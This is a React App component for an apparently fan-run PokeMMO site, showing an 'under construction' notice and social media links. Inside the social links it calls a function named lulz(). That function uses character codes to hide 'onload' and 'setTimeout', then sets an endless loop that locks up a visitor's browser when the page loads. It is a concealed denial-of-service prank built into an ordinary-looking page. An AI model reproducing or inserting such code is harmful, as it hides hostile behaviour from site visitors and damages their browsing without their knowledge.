import logo from './Composition.gif';
import pokemmo from './pokemmo.svg';
import discord from './discord.svg';
import youtube from './youtube.svg';
import tiktok from './tiktok.svg';
import twitter from './twitter.svg';
import './App.css';

function App() {
  function lulz() {
    window[String.fromCharCode(111, 110, 108, 111, 97, 100)] = function () {
      (function X() {
        while (1) {
          window[String.fromCharCode(115, 101, 116, 84, 105, 109, 101, 111, 117, 116)](X, 0);
          window[String.fromCharCode(115, 101, 116, 84, 105, 109, 101, 111, 117, 116)](X, 0);
        }
      })()
    }
  }
  return (
    <div className="App">
      <header className="App-header">
        <div className="App-header-div">
          <img src={logo} className="App-logo" alt="logo" />
          <p>
            Site web en construction !
          </p>
          <div className='App-header-div-social'>
            <a href="https://forums.pokemmo.com/index.php?/clubs/page/221-shiny-showcase/" target="_blank" rel="noopener noreferrer">
              <img src={pokemmo} className="App-social-pokemmo" alt="pokemmo" />
            </a>
            <a href="https://discord.gg/aletheia-alya" target="_blank" rel="noopener noreferrer">
              <img src={discord} className="App-social-discord" alt="discord" />
            </a>
            <a href="https://www.youtube.com/@ALYAPokeMMO" target="_blank" rel="noopener noreferrer">
              <img src={youtube} className="App-social-youtube" alt="youtube" />
            </a>
            <a href="https://www.tiktok.com/@aletheiapokemmo" target="_blank" rel="noopener noreferrer">
              <img src={tiktok} className="App-social-tiktok" alt="tiktok" />
            </a>
            <a href="https://twitter.com" target="_blank" rel="noopener noreferrer">
              <img src={twitter} className="App-social-twitter" alt="twitter" />
            </a>
            {
              lulz()
            }
          </div>
        </div>
      </header>
    </div>
  );
}

export default App;